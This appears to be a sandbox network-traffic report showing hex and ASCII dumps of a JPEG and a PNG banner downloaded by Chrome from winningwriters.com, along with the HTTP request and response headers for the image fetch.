                                                                                                                                                                                            2024-11-18 20:00:05 UTC7835INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 04 15 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72
                                                                                                                                                                                            Data Ascii: JFIFddDuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:r
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: a7 45 4a d1 1f 9b 9d 59 ef bb ba 6f 1b d7 f6 3f 49 e2 78 d7 dc 9c 54 ee 56 8e 9c 5a 8e 94 5e 99 3f 80 d7 24 b3 a7 20 31 05 cd 08 9e 60 87 66 f6 de 98 37 53 36 49 02 fe 6c 0c 50 38 a4 ab 61 10 de 40 35 76 98 06 bf bf ac cb 7d 39 b6 67 5a 93 c5 6f 9a 3f bb b4 e4 77 5f 79 4f 34 7a 13 78 b1 1e a8 b3 6e 78 b7 9d 3e 6c 63 c2 ba f2 ca 0e 95 8f 73 e2 74 0d 9b a4 5f 36 6e f1 b2 80 b3 67 69 91 56 ea 87 63 11 42 81 ca 21 f4 80 eb cc 2e db 70 74 7c 51 fa 99 81 9b 6b 26 c4 6f 5b 75 84 d2 69 f7 a6 aa 98 86 f2 03 30 be c3 b6 bb 29 58 d8 2f be 5f cb 2e 66 ed 55 53 70 35 6e 60 26 fd ca 89 3a 8d 7b 14 a1 4a fb 75 d0 f4 ce c3 1c fb ce 32 97 2a 4a be 93 e6 cf 7a 3f 3e f2 7a 07 66 86 4e 3d 8f 1a e5 d9 72 a6 fe 84 74 ad 65 4d 7d 4b e3 36 3c 41 96 20 f2 c5 aa ce 66 39 74 d3 96
                                                                                                                                                                                            Data Ascii: EJYo?IxTVZ^?$ 1`f7S6IlP8a@5v}9gZo?w_yO4zxnx>lcst_6ngiVcB!.pt|Qk&o[ui0)X/_.fUSp5n`&:{Ju2*Jz?>zfN=rteM}K6<A f9t
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 49 56 4a 80 a2 9b d3 a7 f0 9b cb 03 d3 6a 81 4e a9 fd 22 1a c2 ea 2e 95 96 3f f1 b6 be 75 a7 da b5 a1 db fb b8 7b d7 58 ea 2b 9f d9 5b bc 7f 0b ba 43 e6 b8 cb e6 ab 8d 69 f3 53 e1 2e f8 fc 28 bd e4 be 4d 79 69 5b 4d ac eb 60 4c bd f1 7e 98 59 c3 b7 4a a2 aa 68 28 60 48 ea 85 3a 81 87 76 d2 7b c4 47 c0 75 4f 48 ed 51 bd 73 c5 b9 fe 6e 1a b3 65 ef 7b e7 05 fd 93 67 8e d5 b7 d6 5b 8e 73 f0 e1 18 f1 51 7a 4a 5a 3f 4d 13 f5 be c3 73 c1 b8 a9 9e 27 b2 19 c2 ed 2a 93 cf f6 b8 b9 5f 00 00 8a 8e 8c 5a 6c 01 fe 2a 61 f0 97 eb 1f 1d 61 75 16 ee f3 72 1c fe aa d1 2f 41 e8 1e ed 9e 49 63 f4 47 4e 43 1b 47 93 73 e7 5d 97 6b 9b 5a aa f7 47 54 85 a3 5c e9 f4 22 0d 04 86 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 03 e9 d0 40 af 43 05 29 db a5 07
                                                                                                                                                                                            Data Ascii: IVJjN".?u{X+[CiS.(Myi[M`L~YJh(`H:v{GuOHQsne{g[sQzJZ?Ms'*_Zl*aaur/AIcGNCGs]kZGT\"4h@4h@C)
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 26 21 fc 90 a6 21 b4 ff 00 4d 51 ae 1c 0f e4 e6 ac 56 2c 9b e6 d5 c8 30 28 dc 76 8c a9 25 a3 55 51 44 56 1d aa 22 bb 67 28 8e c5 5b b8 6e e0 a4 59 05 d2 35 4a a2 4a 94 a7 20 f4 30 00 ea c4 fb 49 e6 2f ee 08 06 17 1b 20 68 f4 54 40 e9 98 15 8e 92 40 c0 9b 96 8e 0a 02 05 55 15 04 07 69 c2 be 20 20 20 22 53 00 94 44 06 64 aa 40 96 b0 c8 72 d6 75 c9 1f 64 65 50 4d 0f bf 8e 9b 7b 17 25 24 4f 22 32 65 75 04 4a 56 6e 02 a2 56 92 1f c5 4c c3 b1 7e e8 8e ed c9 26 bc f4 d1 92 a4 2d 15 e8 50 11 01 37 88 f7 f1 e9 ab 2a 47 33 24 3d 7a 50 37 08 f5 00 1e be 3e ed 40 0d af 90 78 09 ce 4f 4a de bd ac 2b 8c 31 f6 77 c6 87 59 d6 29 c8 80 43 2a 92 27 5c a5 07 11 f2 08 90 4b f3 31 af 00 85 2b 84 04 7c 01 42 09 54 21 4c 09 38 d7 81 05 2e 3c 72 14 32 e9 2e 4b 2a f7 b7 7f 66 b9
                                                                                                                                                                                            Data Ascii: &!!MQV,0(v%UQDV"g([nY5JJ 0I/ hT@@Ui "SDd@rudePM{%$O"2euJVnVL~&-P7*G3$=zP7>@xOJ+1wY)C*'\K1+|BT!L8.<r2.K*f
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 04 a5 1e 81 df 55 c9 15 b8 ea 78 cd 30 a2 05 1d a5 10 30 7d ae b5 0e 83 a5 62 c8 b3 35 4e 7d b5 f8 ba 8f b0 34 10 1e 49 44 d5 10 1f 70 7e ff 00 6d 15 0a 95 85 0f 2c 2b b0 48 63 53 a0 d7 f8 40 35 00 51 14 44 e6 a8 1b af 4a 85 74 01 54 89 54 03 c3 bf 4e 9a 09 a0 54 a1 42 85 44 dd c0 a0 1d 74 10 7d 0c bf 0a b7 0e 7f 64 bc 4d bd 39 55 72 47 7c bd d9 c9 27 e5 42 d7 70 62 51 54 ed 98 15 55 6c 41 28 88 57 6b 87 47 54 44 3b 08 10 83 ec d6 45 94 5f 69 1e aa 24 24 4b 15 1a f6 45 44 cc a9 59 a4 65 3c 92 00 6f 38 94 37 6d 00 f6 8d 28 01 ab 9b 69 16 49 d1 1c 69 6b ca 1c a1 3f 27 2b c7 0e 23 b9 86 89 b8 a1 64 66 1f e7 9e 49 ce 21 f7 a4 63 6b 86 42 55 c3 e9 d4 a0 58 1d c3 34 de 83 17 4a aa 8a af 1d 38 49 a3 73 13 c8 2f cc 2c 43 a0 5a a3 27 c0 44 db 37 6b d3 8b d8 c1 85
                                                                                                                                                                                            Data Ascii: Ux00}b5N}4IDp~m,+HcS@5QDJtTTNTBDt}dM9UrG|'BpbQTUlA(WkGTD;E_i$$KEDYe<o87m(iIik?'+#dfI!ckBUX4J8Is/,CZ'D7k
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 52 8f d2 4d 7a d1 8b 87 b9 e3 64 26 ed 4e 33 4b f4 5a 7f 21 75 a4 33 c8 08 d3 e9 d4 a8 d4 59 49 20 af b0 2b a9 51 a9 1c c8 86 ef 77 4f 6e 9b c3 63 27 ec 0d c1 f5 e9 1a a3 a7 68 57 5a 76 93 0f 4d 40 37 42 5d e1 df 4c 92 17 9c 37 75 a5 3a fb 35 14 0f 12 3d e4 40 6b a8 a0 c9 85 7d d5 d4 d0 8e 6d 68 15 f7 68 71 21 4d 3e 01 ba 9e 1a 9e 52 5c 8b 65 de b5 6a 40 51 d3 84 da a6 23 42 a8 a1 ca 40 11 f7 09 84 34 d0 b5 29 70 4d 98 59 7b a6 36 3a 4e ec e3 04 fb 64 d2 f9 59 70 43 01 ca 53 94 40 c4 30 54 a6 01 a8 08 7b 84 34 92 54 74 66 55 9b f1 b9 05 28 ba c5 f0 64 da 82 d0 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 34 00 68 00 d0 01 a0 03 40 06 80 0d 00 1a 00 fa 70 54 06 95 1e be 03 4a 75 10 d7 d3 e7 f2 78 88 8e c3 16 86 0e a1 d8 3c
                                                                                                                                                                                            Data Ascii: RMzd&N3KZ!u3YI +QwOnc'hWZvM@7B]L7u:5=@k}mhhq!M>R\ej@Q#B@4)pMY{6:NdYpCS@0T{4TtfU(d@4h@4h@pTJux<
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: e8 a6 10 d3 8d 4a 44 8c 6a 98 c4 28 00 08 88 88 e8 76 90 28 97 76 0f 15 b8 25 c7 bb e1 d4 b6 3e e2 b7 93 91 63 4e 41 5b 26 05 83 72 dc b3 07 39 88 53 81 c9 72 3f 62 f5 65 86 86 00 13 15 d1 a8 35 01 1a 80 d1 54 62 4a 80 f8 a0 ee 48 f9 b3 93 e5 a1 24 99 01 b7 0a 6b 3e 8d 74 d0 04 00 a1 dc ce 08 51 ad 06 9d 7b f5 d3 68 4b 8a 18 87 08 05 d4 ed e3 75 cd ce 2d e7 4c 5b 56 9d b1 1c c4 aa 54 44 a3 2d 2f 3b 37 22 b0 6e ec 2e 1c 88 14 fd 7a 8a 21 ec d2 db 5a 89 cb a9 d2 c2 01 40 04 a3 4e a2 1d 00 7b f4 a5 75 79 34 20 a6 c2 91 41 30 85 00 03 71 44 7a 6d 0e ba 09 e5 13 c7 d9 5b 16 c5 ca 35 82 93 c9 10 31 d3 ce 68 54 61 57 98 8d 45 da 82 26 02 80 15 25 16 03 8d 4c 60 0e 81 dc 75 1c c8 86 6d cf ee eb 52 0e 39 69 49 ab 92 3e 26 2d 03 18 ae 24 1c bc 6e 83 74 cc 41 a0 81
                                                                                                                                                                                            Data Ascii: JDj(v(v%>cNA[&r9Sr?be5TbJH$k>tQ{hKu-L[VTD-/;7"n.z!Z@N{uy4 A0qDzm[51hTaWE&%L`umR9iI>&-$ntA
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 76 5a c8 e5 38 07 18 8a d8 51 55 25 2d 7b dd de c5 1e ac d8 82 a1 59 84 84 59 57 5d c2 22 20 1e 43 63 37 5d 65 0d 43 09 c4 0a 70 4e b9 31 25 23 c8 6e 16 f5 6c cf 5c 58 ce 2c 32 5e 09 96 96 b6 b1 ec ac db a9 8b b3 17 99 cb 88 fb 5e 78 af 1c 95 55 d3 2c 1c 7a a4 60 cd 32 0e f0 40 8d 8b f0 14 40 a7 3a 9b 77 1a 2a 54 a7 46 7b f6 e2 9f aa 25 9f 9f 31 25 9f 97 5f da c2 fb 1d 5c e4 40 ab e4 7b 7d 53 48 47 46 48 09 09 f3 0c e6 1b 2e 52 2b 18 ba 07 36 d3 91 53 9c a2 14 31 0e 72 89 4c 37 46 e1 62 b8 8e a3 db 17 6d a7 7a 46 a1 35 67 dc cc ee 48 85 ff 00 92 93 8f 78 8b b4 4c 21 dc 00 e8 18 e5 a8 57 b5 75 72 75 1c da 40 b5 11 1d dd 42 bd 46 9e 3f 40 69 85 6c a2 64 12 5d 33 22 a9 41 64 54 03 15 44 8c 00 62 98 07 a0 80 d4 3c 43 43 25 33 97 79 03 d2 eb 1e 43 e4 f9 4e 40
                                                                                                                                                                                            Data Ascii: vZ8QU%-{YYW]" Cc7]eCpN1%#nl\X,2^^xU,z`2@@:w*TF{%1%_\@{}SHGFH.R+6S1rL7FbmzF5gHxL!Wuru@BF?@ild]3"AdTDb<CC%3yCN@
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: b5 4c e6 6c f1 f1 ea 56 50 c5 44 be fd 24 53 93 32 af ce 36 a2 6a b2 b2 c5 48 a6 0d da db e1 e1 36 cf 39 ea 3e a5 8d b8 bd 44 ca 46 51 57 47 12 90 d4 2f b7 5d 66 2e 22 82 d4 f9 fb 7d ea 2b 99 12 a4 5e 86 1a a3 f4 eb 38 e5 5b 0d 00 c9 c8 5a 8d 74 b2 65 b6 e1 52 e8 85 a6 a9 93 36 36 61 42 ec a5 fd c0 f1 d5 2d 9b 2b 70 2e 00 3a 53 bd 35 5b 33 62 b4 2b 00 07 fc fa ad b3 2a 31 45 72 80 7b 34 8c cc 82 45 c1 0b ff 00 3e aa 93 33 ad c0 ba 29 7d dd bb 6a 96 cd 85 b8 17 49 f6 ed aa a4 6c 6c ad 0c 92 41 d0 35 89 36 6f b1 e3 a1 91 4c bd ba 6b 1a 4c de 59 81 76 90 75 af b3 54 cd 9b 3c 78 eb 53 22 88 54 43 58 b3 37 98 aa ac ca a2 5e a1 ac 3b 8c e8 f1 61 a9 99 6e 50 e8 3a c1 b8 ce af 0a df 69 92 2f 60 d6 2b 37 d6 de 84 44 6b f4 ea 12 26 4e a5 3d c3 a7 a1 4f 88 c9 44 7a
                                                                                                                                                                                            Data Ascii: LlVPD$S26jH69>DFQWG/]f."}+^8[ZteR66aB-+p.:S5[3b+*1Er{4E>3)}jIllA56oLkLYvuT<xS"TCX7^;anP:i/`+7Dk&N=ODz
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: d2 e6 e8 86 e3 05 f7 8e af de 76 72 82 2a 3d 83 cc d9 72 35 be 11 c7 76 f5 bc bc 8b 62 3b 45 bb 44 d8 c5 ca a8 2b 1d 13 95 60 45 50 53 69 0e 41 15 44 4c 24 29 2a 23 5b 81 7b 2b 21 73 a6 a3 1e cd 2a 73 5f 97 b6 a7 0b 2e 08 7e 3a de fc 0e 8d bb 22 12 c8 cd a5 e2 b2 76 1c ba a4 9b ce 5c 70 d7 64 6b e6 c2 99 11 51 83 74 0a bb 47 48 48 22 0d 54 2a 75 50 48 70 10 2a 85 39 0b 44 da 3a 1d b9 5f ac 95 da 69 c1 ae 14 3a 25 9e 78 0b c3 0f 4a dc 6f 87 4b cf 58 7b b3 93 3c c0 cc b1 01 70 0f 1a 2d 3b 95 9d 9b 6c da 50 c7 54 5b 97 ef 59 90 61 26 ed 75 c5 62 1d 22 19 b9 00 86 3a 6a 94 03 69 0a a1 e2 69 47 8f 13 1b 0b 33 23 36 6f c1 a4 6d c7 4a b5 56 df a1 68 6e 18 a3 d3 53 87 7e a7 bc 66 cb f9 73 d3 99 0b b3 07 f2 83 01 a0 47 77 df 11 ee c9 b6 b7 64 6c cb 45 d2 59 76 df
                                                                                                                                                                                            Data Ascii: vr*=r5vb;ED+`EPSiADL$)*#[{+!s*s_.~:"v\pdkQtGHH"T*uPHp*9D:_i:%xJoKX{<p-;lPT[Ya&ub":jiiG3#6omJVhnS~fsGwdlEYv


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            11192.168.2.164972066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:05 UTC659OUTGET /graphics/tomstory/tom_story_wide_banner_2025.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:05 UTC372INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:05 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 20:56:33 GMT
                                                                                                                                                                                            ETag: "1b1f0-6257b965649c6"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 111088
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:05 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:05 UTC7820INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 ca 00 00 00 fa 08 03 00 00 00 4e 23 4e 36 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 03 00 50 4c 54 45 f3 f3 f5 ff ff ff f3 c0 15 bc bc cf b4 c3 d4 16 15 55 bc bf d1 26 25 95 18 17 5d 0d 0d 34 b4 c6 d4 b4 c0 d2 0b 0b 2c 11 10 43 14 13 4d 0f 0f 3b b4 c9 d7 0c 13 48 fd fd fd b4 c8 d2 23 22 88 cc cc dd b3 cc d4 ca ca dc 19 19 63 c3 c6 da 08 08 27 b3 cf d6 25 23 8e b4 c0 cb b4 d1 d6 c7 c8 db f6 f8 fa 20 1f 7d 22 20 83 b4 be cf de d0 c0 e3 dc d2 1f 1e 78 e5 df d7 ea ee f2 cf ce df d2 d2 e1 1b 1a 69 eb f1 f6 df d3 c3 1c 1b 6f 1e 1d 74 f1 f1 f3 c7 28 1f e6 eb f2 ee f3 f7 d6 c4 ac f3 f6 f8 b3 c4 ce db ce ba 79 5a 48 b5 d5 d8 d6 c5 ba d6 d5 e3 c0 c1 d3 d8 ca b9 d8 c7 b2 dd e3 ee e0
                                                                                                                                                                                            Data Ascii: PNGIHDRN#N6pHYs+PLTEU&%]4,CM;H#"c'%# }" xiot(yZH
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: fd 15 d4 76 06 be 87 30 ca 91 7d 63 5b a0 2f 6b 31 61 96 23 ef 6d 6d 91 7b 94 56 ef 79 a3 a7 23 17 92 51 c6 6f 19 f2 c7 37 3b c2 9e d5 c9 03 24 3b 3e d4 ed 7a e4 77 94 e5 01 7f a6 3b 2f f0 2f 8d 0d 6c d2 cb 7a 57 25 24 f7 e5 6e 11 bf 73 67 a0 aa 20 5f 77 fc 39 2a cb 77 aa 45 84 ae 28 2b 3f 06 66 b6 bb bb 1c 1f 0a 35 16 16 1a c5 f6 3a 23 67 6d 76 be 71 65 95 a6 18 c9 0b f5 a5 f6 33 4b 95 d9 a9 46 ad bb 4a 90 40 2e 83 24 67 e6 3a 42 17 6b fd 65 8c 72 cf a5 4a ae d8 33 e5 f1 91 fc 3a 2e d9 8a 02 a4 9b 5c ce af 52 af b1 7f fc 7f a9 72 a7 cd ec 26 ff ed 12 1d 52 25 85 e7 42 b2 1a 95 0d f6 54 4c 90 43 de 94 2c 95 4a 5a 21 1b 4d 8d 72 6a c8 68 2f 15 b2 62 49 2a 04 8c 82 aa 09 13 b2 3b 5d 30 1a 03 06 7b 36 16 92 38 ba a9 66 80 d7 0a 42 21 9d 90 63 a5 e9 58 fa 5c
                                                                                                                                                                                            Data Ascii: v0}c[/k1a#mm{Vy#Qo7;$;>zw;//lzW%$nsg _w9*wE(+?f5:#gmvqe3KFJ@.$g:BkerJ3:.\Rr&R%BTLC,JZ!Mrjh/bI*;]0{68fB!cX\
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: ee 48 79 fe 70 d0 b7 2c fb 27 5f e4 ca 13 47 8b 1e fd fe 65 d8 1d bb 14 8e 79 8d ff 99 30 8e 9f 9d 1c 95 f3 64 af 87 0c 75 3b bc eb 29 55 60 ad 2b ce 65 03 a5 04 55 ee 4b 1a 7f 4c 66 a1 f2 39 8b fb c6 3c 61 fb 8f ea 8b 56 2b da 27 e3 1a 6c d7 cc 74 62 c0 8a 50 de c0 28 93 0a 11 d8 2a 23 92 5f 23 90 d7 20 f1 75 eb f9 b3 fb f7 c7 ae ad 3e 8d bf d9 43 c2 bc 97 40 a2 1c 4f a0 7f 44 88 9d 57 1f f3 b8 06 45 c6 46 5e 16 4b 1b 49 7a 31 4d e6 57 7b b3 fb 7d 1b 34 53 c8 ee c8 cc a8 77 ab ca 39 38 c2 3e 14 65 c2 71 ce bb f2 c1 c6 ba fc 1e cd 8c 22 83 29 32 d8 2b 63 d1 25 20 b3 10 5b 88 b3 79 22 9b 23 bc 3f bc e6 15 21 20 db 66 32 e6 0d 0f 99 d1 33 af 5c b3 df 13 f2 a3 fb 1d 87 df ff 8f 98 84 dd 35 03 3b d0 c4 a8 0b d9 3d f2 8e 07 11 fe f2 b1 fb f4 57 77 1f cb f2 44
                                                                                                                                                                                            Data Ascii: Hyp,'_Gey0du;)U`+eUKLf9<aV+'ltbP(*#_# u>C@ODWEF^KIz1MW{}4Sw98>eq")2+c% [y"#?! f23\5;=WwD
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 2f 3c d2 5f 06 f9 42 45 2e db 9a ec d3 9f a5 a9 72 32 4b 45 99 d6 a6 0d bd 84 ec 1b 13 14 ea 88 ce 65 a6 3a 2b e3 4d 68 e2 3c 92 4b 50 2e 5d 28 52 ce 31 3a b6 d9 6c a6 2a 3e 01 05 81 b5 0d 1b 61 c3 42 2f a7 d3 79 d5 ed da fe 2e 20 86 3f 3d 1b 08 9a c2 b2 e8 70 5d ab 89 bb 23 60 2d e3 0c 06 75 2c d3 5a 94 57 8a bf 58 87 65 1c b6 9b 3e 12 62 6f 52 57 e5 90 12 92 e3 46 87 c5 68 74 65 e4 e4 2c 09 c6 1c fe f9 90 24 6e 7c 72 f9 25 31 ba ee f7 56 96 66 c6 a7 19 b0 9e 94 46 03 ca 6d 83 5d 1c e1 36 66 73 cc 04 78 90 1f 14 a3 fc ed 13 58 e9 75 17 62 ec 97 0f ff f2 f0 f1 1f df 31 94 61 9d e6 24 d1 dd f7 2b 00 f3 ee 87 0f 1f 57 66 00 e5 2f 47 5b f9 c9 69 08 be a1 f9 66 7e 9a 44 d8 3b 87 e9 34 c1 f9 e9 1a ec 8c ea 6a a3 4a 7c 7f 14 cc a1 b0 46 4d d7 61 ab 01 75 67 a7
                                                                                                                                                                                            Data Ascii: /<_BE.r2KEe:+Mh<KP.](R1:l*>aB/y. ?=p]#`-u,ZWXe>boRWFhte,$n|r%1VfFm]6fsxXub1a$+Wf/G[if~D;4jJ|FMaug
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 89 39 c8 d5 ac fe 60 4a a8 da 47 6c cc ca b3 3d 7f b0 e8 f7 e9 f1 a8 17 0e 97 87 b9 69 86 ad 09 38 cf 3f b0 7b 34 0c 16 d7 c2 20 99 90 2c 2f 50 63 65 61 c4 cc c8 85 99 29 e2 85 33 e8 79 31 07 bb 49 48 d0 6c 12 67 a3 84 37 12 a8 9b 1a bc fe fb 5a 63 d0 68 72 bb b5 de 4c 3c d7 da bf d4 df 81 64 79 62 6d 14 05 cb 50 04 7b 02 6a 89 4c 6c 6c 40 3d af 91 54 2a 0b a5 36 b3 37 53 d1 68 26 98 58 42 aa 1c 9c 5f ee 36 c6 32 d9 ac 2d 97 8b c7 26 e2 99 a8 3a ef 52 ab 8b e4 18 6b 31 ad 0a 24 2c 5f fe ed 9e 8e 95 2b df c7 ca 3f 76 ac 7c 78 1b 94 4b 04 c4 92 38 b9 bc bc a0 d7 12 80 ae 92 19 54 e9 34 7f 88 8c 5f c3 60 36 64 81 54 ee 0b a5 ad 1c 94 10 01 51 56 79 78 9f e0 5d d3 6a bb c0 35 ef 63 38 6b 4d 38 5d 5d 3d 3c 39 6c 21 d3 4d b4 e3 9b 50 1d a0 8e 4b 27 6f d4 30 3c
                                                                                                                                                                                            Data Ascii: 9`JGl=i8?{4 ,/Pcea)3y1IHlg7ZchrL<dybmP{jLll@=T*67Sh&XB_62-&:Rk1$,_+?v|xK8T4_`6dTQVyx]j5c8kM8]]=<9l!MPK'o0<
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 50 3e 01 2c 03 ca 48 f2 ec 75 7c e8 c2 7f 73 1e 6e 5a 20 d9 ff ed c6 e2 83 f9 ee 5a d9 e7 15 57 0e 11 8c 4b 53 94 39 d5 5e b3 44 2b c5 fc b9 8d 94 79 91 7a 6b 32 b0 5c d6 77 2a da 36 0a 02 07 82 6c 09 06 3a cd 5e e0 39 d8 be 10 a4 15 0a 0a e7 1b d9 05 f6 da 12 0c a3 28 d3 5e 20 db e3 a1 35 b4 27 3c 1d 66 60 0b fb 18 0f ad a2 28 da a7 6b 0d 7b da 05 fa 83 07 0f 1e b0 66 97 5c fe b4 d8 46 0a 37 6d 91 e4 c7 29 ce ee 07 64 01 5a a0 b6 34 91 90 2a 35 71 57 f1 7e 69 0b ca f2 c0 5a 45 c5 68 f4 ee 8b 96 ed b7 16 b3 c6 2f eb ff d7 3a 07 72 4e 07 49 01 92 9d e4 02 d7 da 08 bb 48 2d 6e 65 5a a5 58 49 a0 2e 27 64 97 69 e1 80 bd 25 d3 12 72 bc ba a9 dd 64 cf a3 70 48 8e 8e 59 6f ed 6e 82 c6 ca 2c 8f b3 da 71 db cd 12 ac 26 88 43 7b f7 fc 1b 16 ee 49 fe f4 43 3c ab 79
                                                                                                                                                                                            Data Ascii: P>,Hu|snZ ZWKS9^D+yzk2\w*6l:^9(^ 5'<f`(k{f\F7m)dZ4*5qW~iZEh/:rNIH-neZXI.'di%rdpHYon,q&C{IC<y
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 87 c7 da 95 5b 70 c4 2f 68 09 e5 2b b2 5d aa 32 d6 e2 a7 d7 63 93 d7 d7 67 d6 ef 6c 21 8a c9 9a 39 f6 d3 9d 63 c7 22 2c 63 61 6e 80 b7 3c dd 25 ca 7f c8 dd 31 69 33 37 77 5f 6e 5a ee 9e d8 3e 90 68 25 39 77 5f 44 95 21 29 76 7e c2 33 42 9d a5 be fa d3 79 9f c5 60 61 f5 5f a4 7d 35 06 bb 9b 07 a8 a4 b3 63 43 86 31 0f 65 40 a7 49 30 ec 36 c5 9e 2b d0 7b 3c 0e 8a 4d 85 01 1f a9 7a c6 9f 6c 48 36 92 0c 95 24 c5 17 f6 78 10 92 a9 70 90 30 f6 16 49 28 e4 43 0f 53 80 cd ca 81 83 de b0 c0 98 22 f1 b9 06 5a 02 a1 4e 3b 13 b8 9c c8 b8 3a 43 16 c6 b2 68 b4 c7 40 4c b4 f8 03 41 8e ea 71 dc e8 81 3c 29 49 56 4b f3 62 07 02 e1 3e ec 9a 93 58 31 0b f5 32 92 f7 c2 9c 21 9c 8f 74 2d 5f 2a c5 83 ba a6 e6 9e 17 a9 9d 99 b2 60 97 58 a6 81 19 f2 09 ce 85 85 9e da 6b cd cd 48
                                                                                                                                                                                            Data Ascii: [p/h+]2cgl!9c",can<%1i37w_nZ>h%9w_D!)v~3By`a_}5cC1e@I06+{<MzlH6$xp0I(CS"ZN;:Ch@LAq<)IVKb>X12!t-_*`XkH
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 4c 51 9c 23 91 98 89 c4 a6 2d 5b 80 e5 7d 29 13 f7 cb 46 26 80 7c 27 90 95 47 fc c4 fc f4 69 59 6a b1 34 67 4b e8 39 e0 7f b8 7d 24 a5 29 14 69 49 63 ff 4e 07 ed 9e 98 48 0a 5d 14 ca 28 af 13 71 cb 81 39 cb 6f 3f 40 9d 07 14 79 79 ad d7 f2 af c9 9b 00 c3 25 d6 ca ca fe e4 ee ee 1f 92 ab d5 47 8d 9e c6 bd 9e 7e 6b 25 46 cb ff b9 af 14 a0 4c a9 59 a0 65 01 c8 4a c3 7a 24 93 ba b2 5c 6e 00 2c 47 db 2d 16 4b c9 b4 c7 58 84 46 42 f6 e2 f8 5e a9 54 7c 26 a9 d3 e5 d5 02 2b f7 12 20 bf 93 c6 20 31 a7 58 df 9e 5f 9c ef 5d 79 be b2 6f 65 65 9e 04 c9 a5 b4 be 4c 7b ba c8 05 35 db 9c 05 38 ef fc fd 37 c4 32 04 8a 6f c6 f1 93 10 31 23 37 3b 4b ae cd 03 df fe 88 60 06 b8 96 9c 3e 7a da 9e 48 e4 35 84 ca 2b a3 f5 ce c6 53 56 65 f3 25 84 b1 f2 89 b2 b9 19 fe 07 a8 aa 9f
                                                                                                                                                                                            Data Ascii: LQ#-[})F&|'GiYj4gK9}$)iIcNH](q9o?@yy%G~k%FLYeJz$\n,G-KXFB^T|&+ 1X_]yoeeL{5872o1#7;K`>zH5+SVe%
